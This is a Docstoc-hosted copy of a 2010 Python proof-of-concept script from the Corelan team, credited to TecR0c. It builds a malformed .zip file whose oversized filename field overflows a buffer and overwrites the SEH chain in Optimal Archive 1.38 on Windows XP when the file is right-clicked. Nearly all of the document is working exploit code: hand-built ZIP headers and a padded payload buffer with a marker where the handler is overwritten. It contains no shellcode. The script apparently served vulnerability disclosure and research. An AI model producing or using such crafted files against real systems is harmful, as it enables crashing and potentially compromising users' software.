Docstoc

Optimal Archive v1.38 .zip 0day SEH PoC

Document Sample
Optimal Archive v1.38 .zip 0day SEH PoC Powered By Docstoc
					                                         Optimal Archive v1.38 .zip 0day SEH PoC                      Page 1/2
  1    #!/usr/bin/python
  2    # #######################################################################
  3    # Title:                Optimal Archive 1.38 (.zip) 0day SEH PoC
  4    # Author:               TecR0c − http://tecninja.net/blog & http://twitter.com/TecR0c
  5    # Found by:             TecR0c
  6    # Download:             http://www.optimalaccess.com/oadownload.php?version=oarchive.exe
  7    # Platform:             Windows XP sp3 En
  8    # Advisory:             http://www.corelan.be:8800/advisories.php?id=CORELAN−10−017
  9    # Greetz to:            Corelan Security Team
  10   # http://www.corelan.be:8800/index.php/security/corelan−team−members/
  11   # #######################################################################
  12   # Script provided ’as is’, without any warranty.
  13   # Use for educational purposes only.
  14   # Do not use this code to do anything illegal !
  15   #
  16   # Note : you are not allowed to edit/modify this code.
  17   # If you do, Corelan cannot be held responsible for any damages this may cause.
  18
  19   # Trigger : Right click on specially crafzip file > Boom
  20   # Very strange behavior when debugging
  21
  22   print   "|−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−|"
  23   print   "|                   __             __                 |"
  24   print   "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
  25   print   "| / ___/ __ \/ ___/ _ \/ / __ ‘/ __ \ / __/ _ \/ __ ‘/ __ ‘__ \ |"
  26   print   "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
  27   print   "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
  28   print   "|                                                  |"
  29   print   "|                              http://www.corelan.be:8800 |"
  30   print   "|                                    security@corelan.be |"
  31   print   "|                                                  |"
  32   print   "|−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−[ EIP Hunters ]−−|"
  33   print   "[+] optimal (.zip) − by TecR0c"
  34
  35
  36   ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
  37   "\x00\x00\x00\x00\x00\x00\x00\x00"
  38   "\xe4\x0f"
  39   "\x00\x00\x00")
  40
  41   cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
  42   "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  43   "\xe4\x0f"
  44   "\x00\x00\x00\x00\x00\x00\x01\x00"
  45   "\x24\x00\x00\x00\x00\x00\x00\x00")
  46
  47   eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
  48   "\x12\x10\x00\x00"
  49   "\x02\x10\x00\x00"
  50   "\x00\x00")
  51
  52   buff = "\x42" * 2340
TecR0c                                                                                                03/31/2010
                                   Optimal Archive v1.38 .zip 0day SEH PoC    Page 2/2
  53   buff += "\x44" * 4
  54   buff += "\x42" * (4064−len(buff))
  55   buff += ".txt"
  56
  57   mefile = open(’optimal.zip’,’w’);
  58   mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);
  59   mefile.close()




TecR0c                                                                        03/31/2010

				
DOCUMENT INFO